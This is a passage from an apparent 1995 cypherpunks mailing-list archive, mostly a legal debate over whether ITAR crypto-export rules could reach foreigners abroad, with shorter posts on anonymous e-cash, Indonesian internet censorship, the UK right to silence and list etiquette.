6(1), 213 U.N.T.S. 221. See Funke v. France, 256 Eur. Ct. H.R. (ser. A) at
8 (1993) (holding that Article 6(1) of the European Convention on Human
Rights guarantees the right against self-incrimination); Ying H. Tan, Use
of DTI Interviews Unfair, INDEPENDENT (London), Sept. 30, 1994, at 30
(reporting the decision of the European Commission of Human Rights in
Saunders v. United Kingdom). 



On Fri, 17 Nov 1995, Michael Smith wrote:
0
> >
> >>Forgive me if this point has already been raised, but couldn't an 
> >>objection to such laws be based on the protection against 
> >>self-incrimination? 
> >
> >There is no such right in most (if not all) european countries. In
> >France there is not even the presumption of innocence.
> 
> [Further depressing news deleted]
> 
> Yes, this was my understanding. I guess the point I was groping 


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sat, 18 Nov 1995 06:47:49 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tDf8g-0004LGC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951110003648.3551H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


[sorry for the delay, things are busy here, and apologies too for the 
length of this thing...]

Misunderstanding, piled on misunderstanding, piled on disagreement.
I'll try to focus on the big points, and let the small stuff slide.
Let the record show that Prof. Junger and I still agree on lots of stuff 
that's outside this debate.  I wasn't trying to attack him before, and 
I'm not trying to start a flamewar now.

Main point for the busy:  Claims that the US government could apply the 
ITAR to 2 foreigners abroad and get a US court to buy it are, IMHO, 
unfounded.

On Thu, 9 Nov 1995, Peter D. Junger wrote:
[...]
> seem to have two different areas of disagreement:  (i) whether the
> ITAR's provisions relating to cryptographic software apply to foreign
> persons who disclose (or transmit) cryptographic software to another
> foreign person without the United States

[....the Itar is unconstitutional....]
Yes.
> 
> Now Mr. Froomkin says:
> 
>   In short, in this particular case the ACEA, and by extention the
>   ITAR, doesn't "say what it says" it "says what it must mean".
> 
> (And I dare him to make that assertion in the faculty lounge at Miami
> when some of the more critical and analytically inclined members of
> the Miami law faculty are present.)  I would take this as an admission

I would say it anywhere.  Some days I would even claim to be one of those 
people..,

> that the ACEA and the ITAR does say what it says (even if it must mean
> something else) were it not for the fact that--and this was my ``ultra
> vires'' point--that the ACEA doesn't say it.
> 
> (In discussing the quoted passage I am assuming that ``extention''
> must mean ``extension'' and that it is not used as the opposite of
> ``intention'', if only because I don't know what the latter would be.
> But on the other hand the only dictionaries I have to hand are the COD
> and the on-line version of Webster's Collegiate.)
> 
> The AECA doesn't contain any definition of ``export'' whatsoever; the
> whole issue that we are discussing turns on the interpretation of what
> the ITAR says when it defines ``export'' as including:
> 
>   Disclosing (including oral or visual disclosure) or transferring
>   technical data to a foreign person, whether in the United States or
>   abroad ....
> 
> Now Mr. Froomkin seems to be contending that this language must be
> interpreted as it would be interpreted by some sort of neo-Platonic
> court (probably sitting in Rawl's original position by designation),
> which he calls ``any court''.  The contention is:

Nope.  Never said it, didn't mean it.  I mean a good ol' garden variety 
US federal court.

>   any court construing the ACEA would inevitably read the prohibition
>   on "exporting" to a foreign person as not applying where the nation
>   lacks jurisdiction.  
> 
> Now it was my argument--which Mr. Froomkin helpfully calls an ``ultra
> vires'' argument--that any court reading the ACEA would notice (i)

Here's a misunderstanding (for which I'm happy to take full 
responsibility).  What I meant by the "ultra vires" point is this:
There are lots of ways in which an agency action can be struck down by 
the courts.  Two of them are:

1) The agency interpreted the statute correctly, but the statute was 
unconstitutional -- beyond Congress's powers under the constitution.

2) The agency interpreted the statute Incorrectly, and tried to do 
something beyond the powers delegated to it by congress (the nice thing 
about this is that one doesn't even reach the issue of whether Congress 
could, in theory, have delegated the power in question).

> that there is no language in that act defining ``export'' and (ii)
> that ``export'' does not mean disclosing, or even transferring,
> information (which is what cryptographic software is) and (iii) that,
> in consequence, the Office of Defense Trade Controls exceeded its
> congressionally granted authority, and therefore its constitutional
> authority, when it came up with the perverse provision that is at
> issue here.  But that is the subject of my other, as yet unwritten,
> message.

That's what I meant by my ultra vires assertion.  Type (2) above.  So we 
agree in a sense as to what this problem is -- but I call this a case of 
an agency misconstruing the statute, not a "separation of powers" problem.

Let's assume, for the argument, that I'm wrong and that the agency read 
the statute reasonably (note under Chevron it doesn't have to read it 
"right" just reasonably).  

Does the agency read the statute to apply to two foreigners talking on 
the beach at Calais?  No it does not.   

Did Congress intend the statute to be applied to the two foreigners?  No
evidence that it did. 

Would or should a court read the statute to apply to two foreigners etc.
in the absence of a clear direction from Congress to that effect? No. 

Why not?  Two main reasons.  One is the one you identify:
> Now I take it that Mr. Froomkin's contention turns on the claim that
> Congress lacks jurisdiction under international law to pass a
> statute--or authorize a regulation--that makes it a crime for a
> foreign person to transmit something to another person when both of
> them are outside the United States.  So as to avoid the other

The other one is that even if Congress had the jurisdiction, the court 
would be reluctant to read the statute that way, with the implications 
for foreign relations, comity, etc etc without clear directions to do 
so.  And if you think the court would just formalistically follow the 
words of the statute, see eg Church of the Holy Trinity, 143 US 457 and 
its progeny.

> constitutional and ultra vires and so on issues, let us assume that
> Congress were to amend the ACEA to make it a crime ``to transfer a
> cryptographic device to a foreign person within the United States or
> abroad without first obtaining a license or a waiver of jurisdiction
> from the Office of Defense Trade Controls.''
> 
> And now assume that someone, F, who is a foreign person and who has
> never been in the United States transfers a cryptographic device that
> was not made in the United States or by a United States company to
> another foreign person who person who has never been in the United
> States.  And now assume that F does come to the United States on a
> holiday and that he is arrested and indicted for violating the AECA in
> that he did transfer a cryptographic device to a foreign person.
> 
> The first thing to notice is that the indictment is not defective.
> The only defense--since it is the only one that we are interested in
> and we control the hypothetical--is: ``but that was in a foreign
> country'' and therefore the United States has no jurisdiction under
> international law (or under something) to treat F's actions as a
> crime.
> 
> So the defense moves to dismiss the indict on those grounds.  And the
> prosecution stipulates that the acts charged occured in a foreign
> country, that F is a foreign person, etc.
> 
> On those facts I would hope that the court would construe the statute
> as not covering F's actions outside the United States and would dismiss
> the indictment, but--considering that the statute specifically says it
> applies both within the United States and ``abroad''--I am not nearly
> as sanguine as Mr. Froomkin is.  But let us assume that the indictment
> is dismissed.

I cannot imagine that the court would do anything but dismiss on these 
facts. 

> 
> And now the hypothetical provision in the ACEA is again amended by
> congress to make it a crime ``for (i) a United States citizen to
> transfer a cryptographic device to a foreign person within the United
> States or abroad or (ii) a foreign person to transfer a cryptographic
> device to a foreign person within the United States or abroad, without
> in either case first obtaining a license or a waiver of jurisdiction
> from the Office of Defense Trade Controls.''

Note that now we are more explicit that in the ACEA.
> 
> And now assume that F', who has never been in the United States
> transfers a cryptographic device to a foreign person and thereafter
> comes to the United States and is arrested indicted for violating the
> hypothetical provision of the ACEA.  It would seem to me that there is
> no way that any but the most willfully wrong-headed court (and there
> are, I admit, such courts) would construe the hypothetical provision
> as not covering F's actions, since it does so clearly cover those
> actions.  I mean that there is no way that the court can get away with
> concluding that it does not mean what it says.
> 
> So what can F' do now?  Well, he could try to raise the claim that the
> lack of ``jurisdiction''--which is the justification for Mr. Froomkin's
> ``any court'' construing the ITAR's actual provisions would not apply
> to F or F'--is a ground for dismissing the indictment.
> 
> But how can he raise that point?  He can't very well deny that the
> court has jurisdiction over his person--he's sitting in the court with
> shackels on--and he can't get away with claiming that the court
> doesn't have jurisdiction to try him for violating the ACEA.
> 
> So it would seem that F's only hope would be to move to dismiss the
> indictment on the ground that to continue the prosecution would be to
> deny him due process because the United States lacks jurisdiction
> under international law.

There are a number of other arguments he could make.  E.g. denial of due 
process for lack of notice.  Unconstitutionality of the statute as 
exceeding the powers of congress as a violation of international law.  A 
weaker argument would be an analogy to the ex post facto clause -- now 
the government seeks to apply its laws to him after the fact.  I do not 
think that the Neuremburg precedent would be contrary, since the claim of 
the US there was that some laws of man and nations are always in force 
everywhere.  Restrictions on crypto exports does not fall in that class.

> 
> Now I am no expert in this area, but I would be surprised if the
> courts would recognize this as costitutional defense.  As I understand
> it from talking with somebody here at CWRU who is knowledgeable, the
> courts of the United States tend to defer in such cases to Congress

A vast and unhelpful oversimplification.  what do you mean by "such 
cases"?  Criminal prosecutions of US citizens for messing in foreign 
policy is one thing; criminal prosecutions of foreigners for acts that 
have foreseeable effects here is another thing; criminal prosecutions on 
the facts above is a whole different thing.

> and the executive--when they are in agreement, as they would be in our
> hypothetical--and principles of international law count for little.

It is certainly true that as Justice Jackson put it, the powers of those 
branches are greatest when they agree.  But the constitution trumps all.  

> 
> So F' will ``inevitably''--to use Mr. Froomkin's word--be convicted of
> the crime of delivering a cryptographic device to a foreign person
> outside of the United States.

I do not agree.  See above.

> 
> Now lets get back to the ITAR as it is actually written.  In an actual
> criminal action brought against a foreign person who is accused of
> disclosing cryptographic information to a foreigner outside the United
> States--not that I think such an action will ever actually be
> brought--the government can point out to the court the facts that I
> have just discussed, so the court will be aware that there is no
> constitutional provision requiring the dismissal the indictment, even
> if the indictment is contrary to international law.  And a real court,
> as opposed to Mr. Froomkin's ``any court'' might in those
> circumstances feel free to determine that the ITAR means what it says.
> (That's just common sense.)

But no.  First there is the constitutional arguments.  Then there is the 
idea that we interpret the statute to avoid the constitutional and 
international problems.  Then there is the problem that there are no 
grounds to think that Congress ever intended to reach foreigners in such 
cases (and Holy Trinity Church, 143 US 457 (1892) still gets cited 
(despite its anachronistic view of religion)).

> 
> And, were the government ever to bring such a case it, it would argue,
> and I think that it would convince a lot of real judges, that the
> criminal action does not violate international law because the United
> States is protecting its own economic interests by prosecuting foreign
> persons who disclose cryptographic information to other foreign
> persons outside the United States.  The government's lawyer will
> argue:
> 
>   Judge, the United States is in a real bind.  It is absolutely
>   necessary for our national security that we forbid the export of
>   cryptographic software.  But, on the other hand, as those
>   Cryptopunks keep pointing out, we are distroying our computer
>   industry by enforcing the ITAR against American companies.  So the
>   only solution is to apply the ITAR against foreigners as well so
>   that the American computer industry will have a levelled--I mean a
>   level--field to play upon.  And the anti-trust cases make it
>   absolutely clear that the United States does have jurisdiction to
>   enforce its laws against foreign  criminal who break those laws
>   outside of the United States when their crimes have a negative
>   effect upon the economy of the United States.
> 
> I am afraid that most federal district court judges would buy that
> argument, and I am not even sure that Mr. Froomkin's ``any court''
> wouldn't buy it. 
> 
I think many district judges, most appellate judges, and almost every 
supreme court justice would at least reject, if not laugh at, that 
argument.  The trend is away from assertions of jurisdiction over 
foreigners without minimum contacts, e.g. Asahi (sp?).

> And, in any case, if such a criminal case were to be brought, the
> government would almost certainly be able to allege additional facts
> to help justify the claim that the US does have jurisdiction over the
> matter under international law.

I'm sorry, but everything that follows the line above is irrelevant.  If
there are other grounds to prosecute, the court will use those and avoid
the constitutional problem.  If the foreigner isn't really foreign, then
he's not a foreigner.  I'm going to respond in detail anyway because I
think that the FUD factor may be coming in to play... 

> 
> For example, the defendant might be French, and the French government
> might be cheering the United States government on.  If the crime is a
> crime under both French law and the law of the United States then
> there is going to be no problem with the United States asserting
> jurisdiction.  (That is, if I understand it correctly, Mr. Froomkin's
> murder example.)

I don't see what dual criminality has to do with this.  Am I supposed to 
be on notice that if I do an illegal thing here to my neighbor, I'm 
supposed to be at risk of prosecution in Sri Lanka?  Anyway, recall that 
in the original hypo foreigner A is talking *legally* to foreigner B.  
Even if they are not, it's not within the competence of the US 
government to do anything about it.  Nor -- I have to say this over and 
over and over and over -- has the US government ever asserted in any form 
that it would seek to do anything about this.  Just because an 
over-literal reading of a regulation could lead to that view does not 
equal an actual assertion of jurisdiction by the government.

> 
> Or the defendant may have studied cryptography in the United States,
> before he returned home and disclosed the information.
>
Not relevant.  Note, by the way, that on these facts the "export" was by 
the (us person?) who taught the foreigner crypto in the US, not later.
 
> Or the information that he disclosed had previously been unlawfully
> exported from the United States in violation of the ITAR (PGP, for
> example).

Not relevant.  

> 
> Or the foreign person is an employee of a United States company or a
> foreign company doing business in the United States.
> 
Not a foreigner, or the export is traced to a non-foreigner who then is 
the one charged with the ITAR violation.

> Or even that the disclosure was done by a message transmitted over the
> Internet that happened to be routed through the United States.

So what? The people are still outside the US.

> 
> But the matter is even more simple than that since the government is
> not going to bring those criminal charges against a foreign person or
> a United States person or anyone else if they can possibly avoid it.
> The ITAR's provisions on cryptographic software are used by the
> government to spread fear, uncertainty, and doubt, and to discourage
> the spread of strong cryptography.  Since an actual criminal case
> would almost certainly result in at least significant parts of those
> provisions being held unconstitutional, the government is not going to
> bring such a case if it can find any other ways of satisfying its
> goal.
> 
> And looked at that way, our foreign person who discloses cryptographic
> software to one or more other foreign persons abroad is going to be
> the perfect fall guy.  As I have suggested before, the government will
> simply bar him from getting a visa to enter the United States since
> violation of United States foreign trade regulations is a ground for
> denying a visa--at least an immigrants visa.  And, despite Mr.
> Froomkin's claim that our foreign person would have a cause of action
> if his ``petition'' were denied, he would probably have no recourse
> whatsoever.  Certainly he would have no claim that the United States
> has no jurisdiction to exclude him for acts done by him outside the
> United States; the United States has jurisdiction to exclude
> foreigners for things that the foreigners did outside the United
> States, like believing in polygamy.  And a foreign person outside the
> United States may not have standing to complain of violations of his
> freedom of speech outside the United States in an American court.
> 

I invite you to consider the recent decision of the 9th circuit that 
foreigners in the US have full 1st Am. rights.  Of course, the position 
of the would-be enterant is not the same as the position of even the 
temporary visitor to our shores, since constitutional rights don't attach 
to foreigners until they are in the country, but the language of that 
case is very suggestive.


> But let us assume, contra-factually that Mr. Froomkin is right, and
> that the poor, excluded foreign person would have a good cause of
> action to force the government to give him a visa.  (Though I really
> am curious as to what that action would be.)  That cause of action is
> going to cost tens of thousands of dollars to pursue, and it will take
> years before it is resolved in favour of our foreign person, who will
> be excluded--or sitting in jail with a bunch of Cuban and Chinese
> refugees--until the case is resolved in his failure.

Yes, litigation is expensive.  The foreign person unjustly excluded on 
this hypo will spend the time at home, writing crypto for profit, and 
reducing our tax base.  Meanwhile academic lawyers such as us will be 
representing her free of charge.  The government is sometimes unjust; 
even when you win against it you are worse off often than if you hadn't 
had to fight.  That's a wholly different issue from whether you win in 
court, which is what I thought we were arguing about.

> 
> I am sorry to have written such a long message, and to have been so
> slow in writing it, but I think that part of the problem is that both
> Mr. Froomkin and I were shooting from the hip, and that is why our
> disagreement grew.
> 
> But perhaps it has all been worthwhile, for I do think that there are
> a few useful conclusions that can be drawn from this discussion:
> 
>   (i) We academic lawyers tend to try to settle real world questions
>   as if they were academic questions;

Speak for yourself please.

I do not accept this accusation.  I assert that my "solution" to the
"problem" of whether a court would allow a criminal prosecution of a
foreigner, however "evil", for discussing crypto with another foreigner in
a foreign locale absent the most explicit and direct instructions from
Congress is the correct one: probability near zero.  Direct, clear
instructions from Congress supported by a legislative history or
legislative findings that made it clear that this was a result Congress
intended would raise the probability considerably, but I'd still bet on
the court striking the statute down as violating due process.

The academy is part of the real world.  All so-called real world questions
are fit subjects for academic study.  Much of my work is inspired by
concrete problems, or is (I hope) applicable to them.  Some of my work is
more abstract.  They applications are less immediate.  I'm proud of that
too. 

> 
>   (ii) It is never safe to assume that any court will construe a
>   statute or a regulation as meaning something other than what it
>   says; 

It at least as dangerous to believe that a court will formalistically 
apply text as if statutory construction, especially in the shadow of the 
constitution, were a mechanistic process.

> 
>   (iii) One can only construe a legal text in a particular context;
>   even if one thinks that one can figure out how any court would
>   interpret the text in qustion, one still nees to know how the text
>   got before the court; and

This is a fair point.  The facts *do* matter.  This is why "hard cases 
make bad law."  

> 
>   (iv) The fact that you can always sue the police for unconstitutional
>   harassment isn't of much help when they reach for the rubber hose.

But the fact that you can do so is part of the reason why rubber hoses are 
less common than they would otherwise be.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 18 Nov 1995 06:47:46 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: e$: Come aaaannnndddd Get it!
In-Reply-To: <m0tGVUJ-0008xnC@pacifier.com>
Message-ID: <199511172156.QAA15802@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes: [re: payee anonymity]
> It seems to me that this should be possible, within limits, if the potential
> payee could generate a "blinded" note to be delivered to the payer by
> anonymous means.  The payer could get the note certified by the bank,
> possibly given an extra "blind" if necessary  (is this possible? Desirable?
> Why not?) and then the resulting still-blinded but certified note is posted
> (in encrypted form, I supposed) to the 'net so that only the payee can
> decrypt and unblind it.

This sounds like a version of "Hey, I'll pay you $10, if you give me a ten
dollar bill first." As I understand your protocol, Bob gives Alice an enote,
then Alice gives Bob an enote. Alice isn't paying Bob in any meaningful sense,
since Bob ends up with the same amount of e$ with which he started. Perhaps
you could clarify what you meant.

-Futplex <futplex@pseudonym.com>
"I'm not touched, but I'm aching to be...."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 18 Nov 1995 07:39:08 +0800
To: cypherpunks@toad.com
Subject: Re: Corrections about Bob Noyce and Intel
Message-ID: <199511172211.RAA12522@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Worth magazine of Dec/Jan has a lubricious article on "The 
Super Investors of Silicon Valley":


" 'Rise of the Silicon Patriots,' by Donald Katz. If their egos 
and paychecks are oversized, so is their impact on the economy 
and culture. It's not for nothing that California's venture 
capitalists think they're at the center of the universe."


It traces some of the mauling by rapacious VC tigers of unwary 
techno-bambis and gleefully vaunts winner-take-all when the 
chips are down (multiple puns there) -- commensurate with the 
flatulent flattering flummoxing of this "financial 
intelligence" oilslicker.


For more FFF FinInt organ-grinding the monkeys, see 
"Downloading Warren Buffet's Brain."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sat, 18 Nov 1995 09:30:24 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right in Indonesia ?
Message-ID: <199511180111.RAA12769@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:54 PM 11/17/95 -0500, "James M. Cobb" <jcobb@ahcbsd1.ovnet.com> wrote:
>An 11 17 95 Reuter Information Service newsstory headlined 
>     Politics, not sex, is Indonesian Internet's concern 
...
>   Activists in Indonesia who use the Internet say it is a power- 
>   ful tool for distributing information in a society where self- 
>   censorship abounds, newspapers are tightly controlled, jour- 
>   nalists are jailed and unlicensed magazines banned. 

The primary difference between Indonesian and Singaporean censorship
is that the Singaporeans are a lot more urbane about it, and generally
don't have crowds of protestors to shoot at.  Reporting on the East Timor
activity is an especially good way to get kicked out of the country;
I know people it's happened to.  Uncensorable communications can be
a substantial help, though rubber-hose cryptanalysis is still fairly
effective, and it's the type of place that would use it.

A certain amount of US activism on the East Timor problems is Internet-based;
I don't know how connected it is to Indonesia or East Timor, which is
too underdeveloped to be very active on the net, and has the added problem
that activists are heavily watched.

The Indonesian military recruitment process is unfortunately not something
that crypto can affect much, except by keeping political activist's identities
private so they're not targets.  Basically, the draft board knocks on your
door and says "Uncle <whoever> wants _you_", and they're authorized to shoot you
if you don't cooperate, though they're also authorized to not shoot you.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Sat, 18 Nov 1995 07:42:01 +0800
To: cypherpunks@toad.com
Subject: Re: COE Recommendation No. R (95) 13
In-Reply-To: <Pine.SUN.3.91.951117154130.3578F-100000@viper.law.miami.edu>
Message-ID: <9511172249.AA09569@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>sorry, but there is a right to remain silent in Europe:

Pity the British Tories do not understand that. Because they brought in
the stupid "right of the prosecution to bring attention to the 
defendants refussal to answer questions" it probably means that a
very large number of current prosecutions will get sent down in about
three years time. Guess the cost of that!

It was only done because they had nothing else to spout at their conference.
My father (who is a conservative and whose cousin was chairman of the party
until recently) said he felt sick when he saw the conference on TV. Three 
strikes and you are out type stuff... 

Actually there is a set of crimes relating to fraud where there is a 
specific crime of refusal to answer interrogation. They messed this one
up as well. Rather than phrase it that the trustees of a fund have a duty to
account for the whereabouts of the funds at all times when asked they
simply removed the right to silence. Since trustees take on a position
voluntarily I don't see the same problems in requiring them to perform
certain duties (which involve disclosure) as removing their right to 
silence.


I don't think that the right to remain silent would be read in the manner
asserted however. It is a question of refusal to provide materal evidence
rather than a refusal to testify.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 18 Nov 1995 07:37:15 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: No Privacy Right in UK ?
In-Reply-To: <199511172025.PAA13462@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951117174809.9898L-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


   
 
Perry, 
 
 
Thanks for your inquiry.  The post "No Privacy Right in UK ?" 
is closely related to cryptography in at least three ways. 
 
 
                           (1) 
 
Cryptography is a means to accomplish an end: privacy. That's 
why the epigraph 
 
         Cypherpunks assume privacy is a good thing
             and wish there were more of it 
 
heads up the post, "No Privacy Right in UK ?" 
 
 
                           (2) 
 
Farther, the case discussed in the post was a prosaic example 
of invasion of privacy by deception.  That the case is ordinary, 
and therefore liable to be lost sight of, makes it all the more 
significant that the largest London daily publicized it; and did 
so in a sympathetic manner.  That helps us here in the United 
States to propagate the importance of the right to privacy.  Cy- 
pherpunks --poetic defenders of privacy (see the epigraph)-- can 
reciprocate the favor by bringing it to people's attention. 
   
Cryptography is not the only means of reversing deceptive inva- 
sions of privacy.  But it is peculiarly suitable for reversing 
some such invasions because it uses deception to ensure, rather 
than invade, privacy.  Thus it can provide a model for the so- 
called prosaic cases: the sting.  For the sting also is designed 
to deceive deceivers, criminal or otherwise.  Privacy is, in part, 
protection from victimization. 
 
 
                           (3) 
 
Further, Clinton attended an elite university in the UK.  Can you 
imagine what notions he may have found attractive there?  Notions 
that can be "encoded" to make them attractive to us here in the 
States; then, if we buy into them, can be "decoded" and...applied! 
 
 
Cordially, 
 
Jim 
 
 
 
INCLOSURE: 
 
On Fri, 17 Nov 1995, Perry E. Metzger wrote:

 
 Could you please explain what this has to do with cryptography?
 
 "James M. Cobb" writes:
  
  11 16 95 The Electronic Telegraph runs a newsstory headed 
  
    Doorstep polish researcher was whiplash injuries spy 
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Sat, 18 Nov 1995 07:51:24 +0800
To: cypherpunks@toad.com
Subject: No Privacy Right in Indonesia ?
Message-ID: <Pine.BSD.3.91.951117175152.9898M-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
 
                      Cypherpunks assume privacy is a good thing 
                      and wish there were more of it. 
 
                                        --Welcome to cypherpunks 

 
Friend, 
 
 
An 11 17 95 Reuter Information Service newsstory headlined 
 
     Politics, not sex, is Indonesian Internet's concern 
 
reports that 
 
   In Indonesia, the quiet Internet revolution has not gone un- 
   noticed by the armed forces. 
 
Here are more excerpts from the newsstory: 
 
   Armed forces spokesman Brigadier-General Surwarno Adi- 
   wijoyo told Reuters the military had suggested to the com- 
   munications ministry the need for some sort of "toll gate" 
   to "black out" news which could damage culture or affect 
   security. 
 
   It has also suggested registering uses and users, he said. 
 
   ...nobody doubts the military is watching. 
 
   Activists in Indonesia who use the Internet say it is a power- 
   ful tool for distributing information in a society where self- 
   censorship abounds, newspapers are tightly controlled, jour- 
   nalists are jailed and unlicensed magazines banned. 
 
   Internet users doubt the Indonesian government can legis- 
   late or control the Internet, short of pulling the plug on the 
   nation's soon-to-be-privatised phone system. 
 
Please note that the expression "legislate or control" means 
control by either fraud or force, whichever the military finds 
most convenient. 
 
If the military does one day pull the plug, will that validate or 
invalidate the statement in the "Welcome to cypherpunks" document-- 
 
     Cypherpunks know that a widely dispersed system can't 
     be shut down. 
 
A tangential answer is supplied by Indonesian activists: 
 
   Despite the technical and administrative hurdles with cen- 
   soring an increasingly large volume and web of contacts, 
   Internet users point out such a scheme [of censorship, 
   not plug-pulling] would not stop the increasing distribution 
   of material within the country. 
 
For there are private as well as commercial networks in the 
country. 
 
   Commercial providers' estimates suggest there are around 
   10,000 registered local users, with popularity of the 
   Internet growing among Indonesia's technological and edu- 
   cated elite.... 
 
Please note the expression "registered local users," and re- 
call the military's 
 
         suggested registering [of] uses and users 
 
 
Uses?  Perhaps that means those nominally private networks. 

 
 
             Cypherpunks hope that all people desiring privacy 
             will learn how best to defend it. 
 
                                      --Welcome to cypherpunks 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.   NandO News, which posted the above newsstory, 
        can be accessed at: 
 
                       http://www.nando.net 
 
        The story's online filename is: 
 
                          info733_8.html 
 
        It's datelined: 
 
                 JAKARTA (Nov 16, 1995 - 01:06 EST) 
 
 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 18 Nov 1995 08:04:51 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right in UK ?
In-Reply-To: <Pine.BSD.3.91.951117174809.9898L-100000@ahcbsd1.ovnet.com>
Message-ID: <199511172316.SAA13692@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"James M. Cobb" writes:
> Thanks for your inquiry.  The post "No Privacy Right in UK ?" 
> is closely related to cryptography in at least three ways. 

Actually, I was being rhetorical. It was an inappropriate posting.

> Cryptography is a means to accomplish an end: privacy.

Thats true, but it isn't a means to keep private investigators from
noticing that insurance cheats are perfectly healthy when they claim
to be horribly incapacitiated, which was what the article was about.

> Farther, the case discussed in the post was a prosaic example 
> of invasion of privacy by deception.

Actually, it was a prosaic example of the lengths to which human
stupidity is taken in our court systems. I'm reminded of the rule that
says you can't put a boobytrap in your home -- after all, a person
breaking and entering could injure themselves with it.

It has nothing to do with cryptography, though.

> Further, Clinton attended an elite university in the UK.  Can you 
> imagine what notions he may have found attractive there?

So what. Nothing to do with cryptography.

Take this elsewhere, I say.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 18 Nov 1995 09:09:02 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <9511171814.AA23432@alpha>
Message-ID: <4qiqeD22w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


m5@dev.tivoli.com (Mike McNally) writes:
> Frederick B. Cohen writes:
>  > This is baloney.  When you work for Netscape or Sun and speak about your
>  > company's products, you are representing the company whether you
>  > disclaim it or not.
>
> Baloney.

Fred is right. I used to work for Goldman Sachs & their internet usage policy
stated that when you write to Internet or Usenet from a GS account, it will
reflect on the firm no matter how you disclaim it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RealAudio Welcome Wagon <welcome@realaudio.com>
Date: Sat, 18 Nov 1995 11:48:47 +0800
To: cypherpunks@toad.com
Subject: RealAudio website TEMPORARY PASSWORD
Message-ID: <199511180309.TAA07665@www.realaudio.com>
MIME-Version: 1.0
Content-Type: text/plain


This is an automatic response to your request for a free user account 
on the RealAudio site. Welcome to the world of RealAudio. 

Please do the following:
1. Go to http://www.RealAudio.com/welcome.html
2. Enter the following:

          Username: cpunks 
TEMPORARY Password: New.Norfolk

3. Choose your personal, PERMANENT password for the World of RealAudio

If you have trouble with the software, please refer to
 the RealAudio FAQ and Technical Notes available at
 http://www.RealAudio.com/help.html

You can also contact us through http://www.RealAudio.com/comments.html
Thanks for using RealAudio!
Progressive Networks, Seattle, Washington, USA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 19 Nov 1995 03:17:59 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: NOT CRYPTO RELATED (GET OVER IT)
Message-ID: <Pine.SUN.3.91.951117190659.2884A-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Bay Area S'punks,

Monday, 11/20 5pm Scott Adams, at the Booksmith in San Francisco.
The creator of the  comic starring engineer Dilbert and his dog
Dogbert, will sign his latest book ``It's Obvious You Won't 
Survive by Your Wits Alone.''  1644 Haight St., San Francisco.  
(415) 863-8688.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 18 Nov 1995 12:01:46 +0800
To: cypherpunks@toad.com
